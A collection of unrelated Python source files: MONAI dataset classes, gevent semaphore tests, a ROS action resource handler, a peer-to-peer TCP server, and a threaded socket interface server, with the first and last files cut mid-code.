img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
    It supports loading only specific rows and columns,
    and it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
            every item can be an int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
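# Hedged usage sketch (an addition, not part of the MONAI module): a minimal
# demonstration of the plain Dataset behaviour documented above -- a callable
# transform applied per item, and slicing returning a torch.utils.data.Subset.
# Assumes MONAI and PyTorch are installed; the demo data is made up.
if __name__ == "__main__":
    demo = Dataset(
        data=[{"value": i} for i in range(5)],
        transform=lambda item: {"value": item["value"] * 10},
    )
    print(demo[0])  # -> {'value': 0}
    print(demo[2])  # -> {'value': 20}
    subset = demo[1:4]  # a torch.utils.data.Subset over indices 1, 2, 3
    print([item["value"] for item in subset])  # -> [10, 20, 30]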
|
test__semaphore.py
|
###
# This file is test__semaphore.py only for organization purposes.
# The public API,
# and the *only* correct place to import Semaphore --- even in tests ---
# is ``gevent.lock``, never ``gevent._semaphore``.
##
from __future__ import print_function
from __future__ import absolute_import
import weakref
import gevent
import gevent.exceptions
from gevent.lock import Semaphore
from gevent.lock import BoundedSemaphore
import gevent.testing as greentest
from gevent.testing import timing
class TestSemaphore(greentest.TestCase):
# issue 39
def test_acquire_returns_false_after_timeout(self):
s = Semaphore(value=0)
result = s.acquire(timeout=0.01)
assert result is False, repr(result)
def test_release_twice(self):
s = Semaphore()
result = []
s.rawlink(lambda s: result.append('a'))
s.release()
s.rawlink(lambda s: result.append('b'))
s.release()
gevent.sleep(0.001)
# The order, though, is not guaranteed.
self.assertEqual(sorted(result), ['a', 'b'])
def test_semaphore_weakref(self):
s = Semaphore()
r = weakref.ref(s)
self.assertEqual(s, r())
@greentest.ignores_leakcheck
def test_semaphore_in_class_with_del(self):
# Issue #704. This used to crash the process
# under PyPy through at least 4.0.1 if the Semaphore
# was implemented with Cython.
class X(object):
def __init__(self):
self.s = Semaphore()
def __del__(self):
self.s.acquire()
X()
import gc
gc.collect()
gc.collect()
def test_rawlink_on_unacquired_runs_notifiers(self):
# https://github.com/gevent/gevent/issues/1287
# Rawlinking a ready semaphore should fire immediately,
# not raise LoopExit
s = Semaphore()
gevent.wait([s])
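# Hedged illustration (an addition, not part of the gevent test suite): the
# basic Semaphore protocol the tests above exercise -- acquire() returns True
# once the counter is taken, and a timed acquire() returns False when it would
# otherwise block. Defined only for reference; nothing calls it.
def _semaphore_usage_sketch():
    sem = Semaphore(value=1)
    assert sem.acquire() is True                # counter goes 1 -> 0
    assert sem.acquire(timeout=0.01) is False   # would block, so it times out
    sem.release()                               # counter back to 1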
class TestSemaphoreMultiThread(greentest.TestCase):
# Tests that the object can be acquired correctly across
# multiple threads.
# Used as a base class.
# See https://github.com/gevent/gevent/issues/1437
def _getTargetClass(self):
return Semaphore
def _makeOne(self):
# Create an object that is associated with the current hub. If
# we don't do this now, it gets initialized lazily the first
# time it would have to block, which, in the event of threads,
# would be from an arbitrary thread.
return self._getTargetClass()(1)
def _makeThreadMain(self, thread_running, thread_acquired, sem,
acquired, exc_info,
**thread_acquire_kwargs):
from gevent._hub_local import get_hub_if_exists
import sys
def thread_main():
thread_running.set()
try:
acquired.append(
sem.acquire(**thread_acquire_kwargs)
)
except:
exc_info[:] = sys.exc_info()
raise # Print
finally:
hub = get_hub_if_exists()
if hub is not None:
hub.join()
hub.destroy(destroy_loop=True)
thread_acquired.set()
return thread_main
IDLE_ITERATIONS = 5
def _do_test_acquire_in_one_then_another(self,
release=True,
require_thread_acquired_to_finish=False,
**thread_acquire_kwargs):
from gevent import monkey
self.assertFalse(monkey.is_module_patched('threading'))
import threading
thread_running = threading.Event()
thread_acquired = threading.Event()
sem = self._makeOne()
# Make future acquires block
sem.acquire()
exc_info = []
acquired = []
t = threading.Thread(target=self._makeThreadMain(
thread_running, thread_acquired, sem,
acquired, exc_info,
**thread_acquire_kwargs
))
t.daemon = True
t.start()
thread_running.wait(10) # implausibly large time
if release:
sem.release()
# Spin the loop to be sure the release gets through.
# (Release schedules the notifier to run, and when the
# notifier run it sends the async notification to the
# other thread. Depending on exactly where we are in the
# event loop, and the limit to the number of callbacks
# that get run (including time-based) the notifier may or
# may not be immediately ready to run, so this can take up
# to two iterations.)
for _ in range(self.IDLE_ITERATIONS):
gevent.idle()
if thread_acquired.wait(timing.LARGE_TICK):
break
self.assertEqual(acquired, [True])
if not release and thread_acquire_kwargs.get("timeout"):
# Spin the loop to be sure that the timeout has a chance to
# process. Interleave this with something that drops the GIL
# so the background thread has a chance to notice that.
for _ in range(self.IDLE_ITERATIONS):
gevent.idle()
if thread_acquired.wait(timing.LARGE_TICK):
break
thread_acquired.wait(timing.LARGE_TICK * 5)
if require_thread_acquired_to_finish:
self.assertTrue(thread_acquired.is_set())
try:
self.assertEqual(exc_info, [])
finally:
exc_info = None
return sem, acquired
def test_acquire_in_one_then_another(self):
self._do_test_acquire_in_one_then_another(release=True)
def test_acquire_in_one_then_another_timed(self):
sem, acquired_in_thread = self._do_test_acquire_in_one_then_another(
release=False,
require_thread_acquired_to_finish=True,
timeout=timing.SMALLEST_RELIABLE_DELAY)
self.assertEqual([False], acquired_in_thread)
# This doesn't, of course, notify anything, because
# the waiter has given up.
sem.release()
notifier = getattr(sem, '_notifier', None)
self.assertIsNone(notifier)
def test_acquire_in_one_wait_greenlet_wait_thread_gives_up(self):
# The waiter in the thread both arrives and gives up while
# the notifier is already running...or at least, that's what
# we'd like to arrange, but the _notify_links function doesn't
# drop the GIL/object lock, so the other thread is stuck and doesn't
# actually get to call into the acquire method.
from gevent import monkey
self.assertFalse(monkey.is_module_patched('threading'))
import threading
sem = self._makeOne()
# Make future acquires block
sem.acquire()
def greenlet_one():
ack = sem.acquire()
# We're running in the notifier function right now. It switched to
# us.
thread.start()
gevent.sleep(timing.LARGE_TICK)
return ack
exc_info = []
acquired = []
glet = gevent.spawn(greenlet_one)
thread = threading.Thread(target=self._makeThreadMain(
threading.Event(), threading.Event(),
sem,
acquired, exc_info,
timeout=timing.LARGE_TICK
))
thread.daemon = True
gevent.idle()
sem.release()
glet.join()
for _ in range(3):
gevent.idle()
thread.join(timing.LARGE_TICK)
self.assertEqual(glet.value, True)
self.assertEqual([], exc_info)
self.assertEqual([False], acquired)
self.assertTrue(glet.dead, glet)
glet = None
def assertOneHasNoHub(self, sem):
self.assertIsNone(sem.hub, sem)
@greentest.skipOnPyPyOnWindows("Flaky there; can't reproduce elsewhere")
def test_dueling_threads(self, acquire_args=(), create_hub=None):
# pylint:disable=too-many-locals,too-many-statements
# Threads doing nothing but acquiring and releasing locks, without
# having any other greenlets to switch to.
# https://github.com/gevent/gevent/issues/1698
from gevent import monkey
from gevent._hub_local import get_hub_if_exists
self.assertFalse(monkey.is_module_patched('threading'))
import threading
from time import sleep as native_sleep
sem = self._makeOne()
self.assertOneHasNoHub(sem)
count = 10000
results = [-1, -1]
run = True
def do_it(ix):
if create_hub:
gevent.get_hub()
try:
for i in range(count):
if not run:
break
sem.acquire(*acquire_args)
sem.release()
results[ix] = i
if not create_hub:
# We don't artificially create the hub.
self.assertIsNone(
get_hub_if_exists(),
(get_hub_if_exists(), ix, i)
)
if create_hub and i % 10 == 0:
gevent.sleep(timing.SMALLEST_RELIABLE_DELAY)
elif i % 100 == 0:
native_sleep(timing.SMALLEST_RELIABLE_DELAY)
except Exception as ex: # pylint:disable=broad-except
import traceback; traceback.print_exc()
results[ix] = str(ex)
ex = None
finally:
hub = get_hub_if_exists()
if hub is not None:
hub.join()
hub.destroy(destroy_loop=True)
t1 = threading.Thread(target=do_it, args=(0,))
t1.daemon = True
t2 = threading.Thread(target=do_it, args=(1,))
t2.daemon = True
t1.start()
t2.start()
t1.join(1)
t2.join(1)
while t1.is_alive() or t2.is_alive():
cur = list(results)
t1.join(7)
t2.join(7)
if cur == results:
# Hmm, after two seconds, no progress
run = False
break
self.assertEqual(results, [count - 1, count - 1])
def test_dueling_threads_timeout(self):
self.test_dueling_threads((True, 4))
def test_dueling_threads_with_hub(self):
self.test_dueling_threads(create_hub=True)
# XXX: Need a test with multiple greenlets in a non-primary
# thread. Things should work, just very slowly; instead of moving through
# greenlet.switch(), they'll be moving with async watchers.
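
# --- Illustrative sketch (editor's addition, not part of the original test suite) ---
# A compact version of the cross-thread scenario tested above: the main thread holds the
# semaphore, a native thread blocks in acquire(), and release() from the main thread
# (plus spinning the hub so the notifier runs) wakes the waiter up.
def _cross_thread_acquire_demo():
    import threading
    sem = Semaphore(1)
    sem.acquire()  # make the next acquire block
    acquired = []
    waiter = threading.Thread(target=lambda: acquired.append(sem.acquire(timeout=5)))
    waiter.daemon = True
    waiter.start()
    gevent.sleep(timing.SMALLEST_RELIABLE_DELAY)  # give the thread time to start waiting
    sem.release()
    for _ in range(5):
        gevent.idle()  # let the notifier deliver the wakeup to the other thread
    waiter.join(5)
    return acquired  # expected: [True]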
class TestBoundedSemaphoreMultiThread(TestSemaphoreMultiThread):
def _getTargetClass(self):
return BoundedSemaphore
@greentest.skipOnPurePython("Needs C extension")
class TestCExt(greentest.TestCase):
def test_c_extension(self):
self.assertEqual(Semaphore.__module__,
'gevent._gevent_c_semaphore')
class SwitchWithFixedHash(object):
# Replaces greenlet.switch with a callable object
# with a hash code we control. This only matters if
# we're hashing this somewhere (which we used to), but
# that doesn't preserve order, so we don't do
# that anymore.
def __init__(self, greenlet, hashcode):
self.switch = greenlet.switch
self.hashcode = hashcode
def __hash__(self):
raise AssertionError
def __eq__(self, other):
raise AssertionError
def __call__(self, *args, **kwargs):
return self.switch(*args, **kwargs)
def __repr__(self):
return repr(self.switch)
class FirstG(gevent.Greenlet):
# A greenlet whose switch method will have a low hashcode.
hashcode = 10
def __init__(self, *args, **kwargs):
gevent.Greenlet.__init__(self, *args, **kwargs)
self.switch = SwitchWithFixedHash(self, self.hashcode)
class LastG(FirstG):
# A greenlet whose switch method will have a high hashcode.
hashcode = 12
def acquire_then_exit(sem, should_quit):
sem.acquire()
should_quit.append(True)
def acquire_then_spawn(sem, should_quit):
if should_quit:
return
sem.acquire()
g = FirstG.spawn(release_then_spawn, sem, should_quit)
g.join()
def release_then_spawn(sem, should_quit):
sem.release()
if should_quit: # pragma: no cover
return
g = FirstG.spawn(acquire_then_spawn, sem, should_quit)
g.join()
class TestSemaphoreFair(greentest.TestCase):
def test_fair_or_hangs(self):
# If the lock isn't fair, this hangs, spinning between
# the last two greenlets.
# See https://github.com/gevent/gevent/issues/1487
sem = Semaphore()
should_quit = []
keep_going1 = FirstG.spawn(acquire_then_spawn, sem, should_quit)
keep_going2 = FirstG.spawn(acquire_then_spawn, sem, should_quit)
exiting = LastG.spawn(acquire_then_exit, sem, should_quit)
with self.assertRaises(gevent.exceptions.LoopExit):
gevent.joinall([keep_going1, keep_going2, exiting])
self.assertTrue(exiting.dead, exiting)
self.assertTrue(keep_going2.dead, keep_going2)
self.assertFalse(keep_going1.dead, keep_going1)
sem.release()
keep_going1.kill()
keep_going2.kill()
exiting.kill()
gevent.idle()
if __name__ == '__main__':
greentest.main()
|
resource_handlers.py
|
#!/usr/bin/python
'''
# =====================================================================
# Abstract resource handlers for ROS Actions and ROS Services
#
# .. Warning:: ROS Services are currently not supported
#
# Author: Marc Sanchez Net
# Date: 05/15/2019
# Copyright (c) 2019, Jet Propulsion Laboratory.
# =====================================================================
'''
# General imports
import abc
from threading import Lock, Semaphore, Thread
from Queue import PriorityQueue
import json
# ROS import
from actionlib import SimpleActionClient
import rospy
from std_msgs.msg import String
# PDRA imports
from pdra.core import Result
# =====================================================================
# === Global variables
# =====================================================================
# Max size for the dispatcher queues. 0 = infinity
MAX_QUEUE_SIZE = 0
# =====================================================================
# === Abstract Resource Handler for ROS Actions
# =====================================================================
class PdraResourceHandlerAction(object):
__metaclass__ = abc.ABCMeta
def __init__(self, dispatcher, agent_id, resource_id, preempt_actions=False):
# Store variables
self.dispatcher = dispatcher
self.agent_id = agent_id
self.resource_id = resource_id
self.current_obligation = None
self.preempt_actions = preempt_actions
self.is_alive = True
self.status_publisher = rospy.Publisher(
'resources_in_execution', String, queue_size=10)
self.status_log_publisher = rospy.Publisher(
'resources_activity_log', String, queue_size=10)
# Create a queue to store new obligations as they arrive
self._queue = PriorityQueue(maxsize=MAX_QUEUE_SIZE)
# Create a semaphore to avoid action preemption of ROS actionlib
self.semaphore = Semaphore(0)
# Create a lock for the current obligation
self.lock = Lock()
# Create client to request services
ac_name = self.action_name()
self.ac = SimpleActionClient(ac_name, self.action_type_cls)
self.ac.wait_for_server()
# Run handler
self.run()
def action_name(self):
return '/{}/resource/{}'.format(self.agent_id, self.resource_id)
@abc.abstractproperty
def action_type_cls(self):
pass
@abc.abstractproperty
def action_goal_cls(self):
pass
@abc.abstractmethod
def action_feedback_cls(self):
pass
@abc.abstractmethod
def fill_goal_info(self, *args, **kwargs):
pass
@abc.abstractmethod
def serialize_goal_results(self, *args, **kwargs):
pass
def log_request_done(self, *args, **kwargs):
pass
def run(self):
self.th = Thread(target=self._process_obligations)
self.th.setDaemon(True)
self.th.start()
def _shutdown(self):
""" Indicate exit with max priority """
self.is_alive = False
self._queue.put_nowait((-float('inf'), ''))
def _new_obligation(self, obl):
""" Put new obligations into to the processing queue """
# Store in queue
self._queue.put_nowait((obl.priority, obl))
# Log obligation arrival
self.loginfo('Queued obligation from agent {}. Queue length: {}'.format(
obl.req_agent, self._queue.qsize()))
def _process_obligations(self):
# Process forever
while True:
# Get the next obligation. If empty, block
priority, obl = self._queue.get(True)
# If no longer alive, exit
if not self.is_alive:
break
# If this obligation is not valid, skip
if not obl.valid:
self.loginfo('Invalid obligation.')
continue
# Log arrival
self.loginfo('Process obligation from agent {}. Queue length: {}'.format(
obl.req_agent, self._queue.qsize()))
res_status = (obl.req_agent, self.resource_id,
'start', rospy.get_time())
self.status_publisher.publish(json.dumps(res_status))
# Protect everything with a lock to avoid race conditions
with self.lock:
# Store current obligation
self.current_obligation = obl
# Create the new goal
goal = self.action_goal_cls()
# Add parameters to goal
goal = self.fill_goal_info(goal)
# Send out obligation to resource
self.ac.send_goal(goal, done_cb=self.request_done,
feedback_cb=self.request_feedback)
# If you want to preempt actions, continue
if self.preempt_actions:
continue
# Wait until the action has finished if no preemption is desired
self.semaphore.acquire()
def request_done(self, goal_status, goal_result):
""" Handles request completion """
# Update log
self.loginfo('Request done.')
res_status = (self.current_obligation.req_agent,
self.resource_id, 'end', rospy.get_time())
self.status_publisher.publish(json.dumps(res_status))
self.log_request_done(goal_result)
# Create a new result
result = Result.from_obligation(self.current_obligation,
srv_agent=self.agent_id,
values=self.serialize_goal_results(goal_result))
# Delete current obligation. Not needed anymore
with self.lock:
self.current_obligation = None
# Pass the new result to the dispatcher
self.dispatcher._new_result(result)
# If you are not managing preemption, you are done
if self.preempt_actions:
return
# Indicate that the action has finished
self.semaphore.release()
def request_feedback(self, msg):
""" Handles request feedback """
pass
def loginfo(self, msg, *args):
msg = msg.format(*args)
rospy.loginfo('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
def logwarn(self, msg, *args):
msg = msg.format(*args)
rospy.logwarn('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
def logerr(self, msg, *args):
msg = msg.format(*args)
rospy.logerr('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
def logdebug(self, msg, *args):
msg = msg.format(*args)
rospy.logdebug('[%s/%s_rhdlr]: %s', self.agent_id,
self.resource_id, msg)
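
# ---------------------------------------------------------------------
# Illustrative sketch (editor's addition, not part of the original module):
# the minimum a concrete subclass is expected to provide. The action, goal
# and feedback classes referenced here are hypothetical placeholders; a real
# handler would return the actionlib message classes generated for its action.
# ---------------------------------------------------------------------
class ExampleResourceHandler(PdraResourceHandlerAction):

    @property
    def action_type_cls(self):
        # Hypothetical: return <pkg>.msg.<Name>Action here
        raise NotImplementedError('replace with a real actionlib Action class')

    @property
    def action_goal_cls(self):
        # Hypothetical: return <pkg>.msg.<Name>Goal here
        raise NotImplementedError('replace with a real actionlib Goal class')

    def action_feedback_cls(self):
        # Hypothetical: return <pkg>.msg.<Name>Feedback here
        raise NotImplementedError('replace with a real actionlib Feedback class')

    def fill_goal_info(self, goal):
        # Copy fields from self.current_obligation into the goal message
        return goal

    def serialize_goal_results(self, goal_result):
        # Convert the action result into something JSON-serializable for Result
        return {}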
# =====================================================================
# === Abstract Resource Handler for ROS Services
# =====================================================================
# TODO
|
server.py
|
# -*- coding: utf-8 -*-
"""
Peer Server Module
------------------
Contains the server engine for the peer.
"""
__all__ = ['PeerServer']
# std imports
import re
import json
import socket
import traceback
import threading
# compatibility
from six import add_metaclass
# package imports
import net
# package imports
from net.peer.handler import PeerHandler
from net.imports import socketserver, ConnectionRefusedError
# globals
SINGLETON = None
# utilities
ID_REGEX = re.compile(r"(?P<host>.+):(?P<port>\d+) -> (?P<group>.+)")
# threading
LOCK = threading.Lock()
class SingletonServer(type):
"""
This protects the server from being replicated unless it is for testing.
"""
instance = None
def __call__(cls, *args, **kwargs):
if kwargs.get('test'):
return super(SingletonServer, cls).__call__(*args, **kwargs)
if not cls.instance:
cls.instance = super(SingletonServer, cls).__call__(*args, **kwargs)
return cls.instance
# noinspection PyMissingConstructor
@add_metaclass(SingletonServer)
class PeerServer(socketserver.ThreadingMixIn, socketserver.TCPServer, object):
# adding to inheritance object for 2.7 support
"""
Base PeerServer class that handles all incoming and outgoing requests.
"""
@staticmethod
def ports():
"""
        All ports defined in the environment.
        :return: list[int]
"""
return [port for port in range(net.PORT_START, net.PORT_START + net.PORT_RANGE)]
@staticmethod
def ping(port, host=socket.gethostname()):
"""
Ping a port and check if it is alive or open.
:param port: required port to hit
        :param host: host address; defaults to the local hostname
:return: bool
"""
# sockets
interface = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
interface.settimeout(0.25)
try:
interface.connect((host, port))
interface.close()
return True
except (ConnectionRefusedError, socket.error):
return False
def __init__(self, test=False):
# descriptor
self._host = net.HOST_IP
self._port = self.scan_for_port()
# handle threading
self._thread = threading.Thread(target=self.serve_forever)
self._thread.daemon = True
# launch the server
self._thread.start()
@property
def port(self):
"""
Port that the peer is running on.
:return: int
"""
return self._port
@property
def host(self):
"""
Host that the peer is running on.
:return: str
"""
return self._host
def scan_for_port(self):
"""
Scan for a free port to bind to. You can override the default port range
and search range by setting the environment variables NET_PORT
NET_PORT_RANGE.
Port range:
default 3010-3050
:return: int
"""
# cast as int and default to 3010 and 40
port = net.PORT_START
port_range = port + net.PORT_RANGE
net.LOGGER.debug("Scanning {0} ports for open port...".format(port_range - port))
while port <= port_range:
# ping the local host ports
if not self.ping(port):
try:
super(PeerServer, self).__init__((self.host, port), PeerHandler)
net.LOGGER.debug("Stale Port: {0}".format(port))
                except (OSError, socket.error):
                    port += 1
                    continue
net.LOGGER.debug("Found Port: {0}".format(port))
return port
port += 1
# throw error if there is no open port
if port > port_range:
raise ValueError("No open port found between {0} - {1}".format(port, port_range))
@staticmethod
def request(host, port, connection, args, kwargs):
"""
Request an action and response from a peer.
:param host: target host ipv4 format
:param port: target port int
:param connection: the target connection id to run
:param args: positional arguments to pass to the target connection (must be json compatible)
:param kwargs: keyword arguments to pass to the target connection (must be json compatible)
:return: response from peer
"""
# socket connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# set the time out on the function
if kwargs.get('time_out'):
sock.settimeout(kwargs.get('time_out'))
# connect
sock.connect((host, port))
# convert the data to json and then bytes
data = {'connection': connection, 'args': args, 'kwargs': kwargs}
try:
data = json.dumps(data)
except TypeError:
data = str(data)
payload = data.encode('ascii')
try:
# send request
sock.sendall(payload)
# sock
raw = sock.recv(1024)
# safely close the socket
sock.close()
except Exception as err:
# safely close the socket
sock.close()
# handle error logging
net.LOGGER.error(traceback.format_exc())
raise err
response = raw.decode('ascii')
try:
return json.loads(response)
except Exception:
return response
def protected_request(self, host, port, connection, args, kwargs, stale):
"""
This allows for protected requests. Intended for threaded event calls.
.. warning::
INTERNAL USE ONLY
Do not use this directly, it will only cause you pain.
:param host: target host ipv4 format
:param port: target port int
:param connection: the target connection id to run
:param args: positional arguments to pass to the target connection (must be json compatible)
:param kwargs: keyword arguments to pass to the target connection (must be json compatible)
:param stale: share resource for detecting old peers
:return: response from peer
"""
try:
self.request(host, port, connection, args, kwargs)
except Exception as e:
if isinstance(e, ConnectionRefusedError):
# thread handling
LOCK.acquire()
stale.append((host, port))
LOCK.release()
else:
net.LOGGER.warning(
"An error has happened a remote peer. "
"This was a protected request and will "
"ignore the error response.\n\t"
"Peer: {0}".format((host, port))
)
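
# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A hedged example of how the static helpers above fit together: ping a peer port, then
# send it a JSON request. The host, port and connection id below are hypothetical.
def _example_peer_request():
    if PeerServer.ping(3010, host="127.0.0.1"):
        return PeerServer.request(
            host="127.0.0.1",
            port=3010,
            connection="example-connection-id",  # hypothetical connection id
            args=[],
            kwargs={},
        )
    return None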
|
interfaceserver.py
|
"""
This module provides an interface for interacting with long lasting calculations via a TCP socket.
"""
# source: http://stackoverflow.com/questions/23828264/
# how-to-make-a-simple-multithreaded-socket-server-in-python-that-remembers-client
import socket
import threading
import time
import Queue
from log import logging
from ipydex import IPS
# for data
msgqueue = Queue.Queue()
ctrlqueue = Queue.Queue()
running = False
listener = None
# Collect all known messages here to avoid confusion
class MessageContainer(object):
def __init__(self):
self.lmshell_inner = "lmshell_inner"
self.lmshell_outer = "lmshell_outer"
self.plot_reslist = "plot_reslist"
self.change_x = "change_x"
# change the weight matrix
self.change_w = "change_w"
self.run_ivp = "run_ivp"
messages = MessageContainer()
server = []
client_list = []
threads = []
class ThreadedServer(object):
def __init__(self, host, port):
server.append(self)
self.host = host
self.port = port
confirmflag = False
for i in range(500):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port+i))
break
except socket.error as err:
confirmflag = True
logging.warn("port {} already in use, increasing by 1.".format(self.port+i))
continue
logging.debug("Connected to localhost:{}".format(self.port + i))
if confirmflag:
raw_input("Press Enter.")
def listen(self):
self.sock.listen(5)
while True:
logging.info("listening")
            # wait for an incoming connection
client, address = self.sock.accept()
if not ctrlqueue.empty():
msg = ctrlqueue.get()
ctrlqueue.task_done()
if "exit" in msg:
break
client.settimeout(None)
client_list.append(client)
sublistener = threading.Thread(target=self.listentoclient, args=(client, address))
threads.append(sublistener)
# end this thread if the main thread finishes
sublistener.daemon = True
sublistener.start()
def listentoclient(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
msgqueue.put(data)
else:
logging.info('Client disconnected')
client.close()
except IOError:
client.close()
return False
def start_stopable_thread(callable, dt=0.1, name=None):
"""
    This function produces a function that starts a thread
    and then waits for a message to terminate it.
    This construction (with a parent thread that polls a queue)
    allows blocking worker threads to be stopped safely.
    :param callable: callable which will be run in the thread
    :param dt: polling interval in seconds
    :param name: optional name for the worker thread
"""
def thrdfnc():
thr = threading.Thread(target=callable)
if name is not None:
thr.name = name
threads.append(thr)
thr.daemon = True
thr.start()
while True:
if not ctrlqueue.empty():
msg = ctrlqueue.get()
ctrlqueue.task_done()
if "exit" in msg:
break
time.sleep(dt)
print "finish threads"
return thrdfnc
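
# ---------------------------------------------------------------------
# Illustrative sketch (editor's addition, not part of the original module):
# how the start/stop pattern above is meant to be used. A blocking worker is
# wrapped by the polling parent produced by start_stopable_thread, and the
# whole construct is shut down later by putting "exit" on ctrlqueue.
def _stoppable_thread_demo():
    def blocking_worker():
        while True:
            time.sleep(0.5)  # stands in for a blocking operation

    parent_fnc = start_stopable_thread(blocking_worker, dt=0.1, name="demo-thread")
    parent = threading.Thread(target=parent_fnc)
    parent.daemon = True
    parent.start()
    # ... later: request shutdown (the daemonized worker dies with the process)
    ctrlqueue.put("exit")
    return parent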
def listen_for_connections(port):
target = ThreadedServer('', port).listen
thrdfnc = start_stopable_thread(target, name="listen-thread")
thr = threading.Thread(target=thrdfnc)
threads.append(thr)
thr.daemon = True
thr.start()
# TODO: implement that flag without global keyword
global running
running = True
def stop_listening():
ctrlqueue.put("exit")
# time.sleep(2)
# IPS()
# server[-1].sock.close()
# time.sleep(2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
